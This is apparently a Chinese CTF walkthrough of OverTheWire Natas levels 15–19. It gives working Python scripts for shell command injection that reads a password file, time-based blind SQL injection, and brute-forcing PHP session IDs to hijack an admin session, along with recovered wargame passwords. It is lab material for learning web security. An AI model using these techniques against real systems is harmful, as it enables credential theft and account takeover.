Natas Level 15 → Level 16
提示:shell脚本中 $() 可以在引号中执行命令嵌套,可以在grep中在构造一个grep,例如:
grep -i " $(grep ^pwd password.txt)"worng doctionary.txt
程序会先执行子shell去查询password.txt文件中pwd字符串,如果没有匹配到,就会输出空,外层相当于执行grep -i worng dictionary.txt,到dictionary.txt中查询worng字符串,查询到就会输出wrong字符串,反之,如果内层查询到,外层就会输出空。所以可以利用这点进行密码爆破。我用的还是python实现代码如下:
import urllib.request
import urllib.parse
import re
url = 'http://natas16.natas.labs.overthewire.org'
headers = {
'Host': 'natas16.natas.labs.overthewire.org',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Authorization': 'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA==',
'Connection': 'keep-alive',
'Referer': 'http://natas16.natas.labs.overthewire.org/?needle=accounts&submit=Search',
'Cookie': '__utma=176859643.1665848136.1639378791.1640070651.1640436097.15; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
'Upgrade-Insecure-Requests': '1'
}
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
n1 = '$(grep ^'
n2 = ' /etc/natas_webpass/natas17)accounts'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
pattern = re.compile(r'\naccounts')
pwd = ''
values = {
'needle':'',
'submit':'Search'
}
for i in range(length):
for ch in dic:
needle = n1 + pwd + ch + n2
print(needle)
values['needle'] = needle
data = urllib.parse.urlencode(values)
r = url+'?'+ data
req=urllib.request.Request(url=r,headers=headers,method='GET')
response = urllib.request.urlopen(req)
html = response.read().decode('ascii')
if pattern.search(html):
continue
else:
pwd += ch
break
print(pwd)
username:natas17
password:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
过关!
Natas Level 16 → Level 17
提示:打开源代码发现跟之前比较发现,输出的内容被注释掉了,针对mysql数据库注入,一般是三个方向:
- 基于回显的注入,服务器会返回一些信息
- 基于时间的盲注,服务器不返回任何信息,可以巧妙构造SQL语句,通过服务器响应时间的长短来判断一些信息
- 基于报错的注入(略)
之前那题就是基于回显的注入,本题是基于时间的盲注
我是用python编写脚本,代码如下:
import requests
url = 'http://natas17.natas.labs.overthewire.org/index.php'
headers = {
'Host': 'natas17.natas.labs.overthewire.org',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://natas17.natas.labs.overthewire.org',
'Authorization': 'Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw==',
'Connection': 'keep-alive',
'Referer': 'http://natas17.natas.labs.overthewire.org/',
'Cookie': '__utma=176859643.1665848136.1639378791.1640436097.1640518734.16; __utmz=176859643.1639378791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=176859643',
'Upgrade-Insecure-Requests': '1'
}
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
n1 = 'natas18" AND BINARY password LIKE "'
n2 = '%" AND SLEEP(10)#'
length = len('AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
pwd = ''
for i in range(length):
for ch in dic:
name = n1 + pwd + ch + n2
print(name)
data = {'username':name}
res = requests.post(url,data=data,headers=headers)
time = res.elapsed.total_seconds()
print(time)
if time > 10:
pwd += ch
break
print(pwd)
username:natas18
password:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
注意:由于网络原因,建议延时最好时间长一点我这边设置10秒SLEEP(10),不然会错
过关!
Natas Level 17 → Level 18
提示:通过阅读源代码发现只有通过管理员身份登录才能获取到密码,身份认证的信息是存放在$_SESSION变量中,那么可以通过session会话劫持来装作管理员登录网站,session会话劫持需要先获取到session_id,拿到session_id后就可以装作管理员登录网站了。那么现在要做的就是获取到session_id,通过bp抓包发现cookies中有个字段PHPSESSIONID这个就是服务器用来判断用户身份的,那么我们只要获取到管理员对应的PHPSESSIONID,那么就可以用管理员身份登录了。
发现PHPSESSIONID的值只是纯数字,源代码中发现 $maxid=640,意思就是session_id最大就是640.那么我们就直接爆破,用python编写如下代码:
import requests
import re
url = 'http://natas18.natas.labs.overthewire.org/'
headers = {
'Host': 'natas18.natas.labs.overthewire.org',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Authorization': 'Basic bmF0YXMxODp4dktJcURqeTRPUHY3d0NSZ0RsbWowcEZzQ3NEamhkUA==',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'
}
pattern = re.compile(r'You are logged in as a regular user')
for i in range(640):
val = str(i)
cookies = {'PHPSESSID':val}
res = requests.get(url,headers=headers,cookies=cookies)
if pattern.search(res.content.decode('ascii')):
print(val)
else:
print('session_id=' + val)
print(res.content.decode('ascii'))
break
执行脚本,OK发现管理员的session_id=119和下一关密码
username:natas19
password:4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
过关!
Natas Level 18 → Level 19
提示:这关的源码和上关一样,但是这关的PHPSESSIONID不是纯数字了,多试试几次找找规律发现PHPSESSIONID前7位是数字,找规律发现都是3xxxxxx的,那么就从3000000开始爆破,后面的几位是固定的’d61646d696e’,那么还是和上面一样直接爆破,时间有点长,喝杯咖啡去哈,代码如下:
import requests
import re
url = 'http://natas19.natas.labs.overthewire.org/index.php'
headers = {
'Host': 'natas19.natas.labs.overthewire.org',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Authorization': 'Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw==',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'
}
pattern = re.compile(r'You are an admin')
s_val = 3000000 #PHPSESSIONID前7位数字,admin的前7位是3238312
while(1):
session_id = str(s_val) + 'd61646d696e'
print('PHPSESSID: ' + session_id)
cookies = {'PHPSESSID':session_id}
res = requests.get(url,headers=headers,cookies=cookies)
if pattern.search(res.content.decode('ascii')):
print('session_id=' + session_id)
print(res.content.decode('ascii'))
break
s_val += 1
脚本跑完发现,session_id=3238312d61646d696e,就是管理员的session_id
username:natas20
password:eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
过关!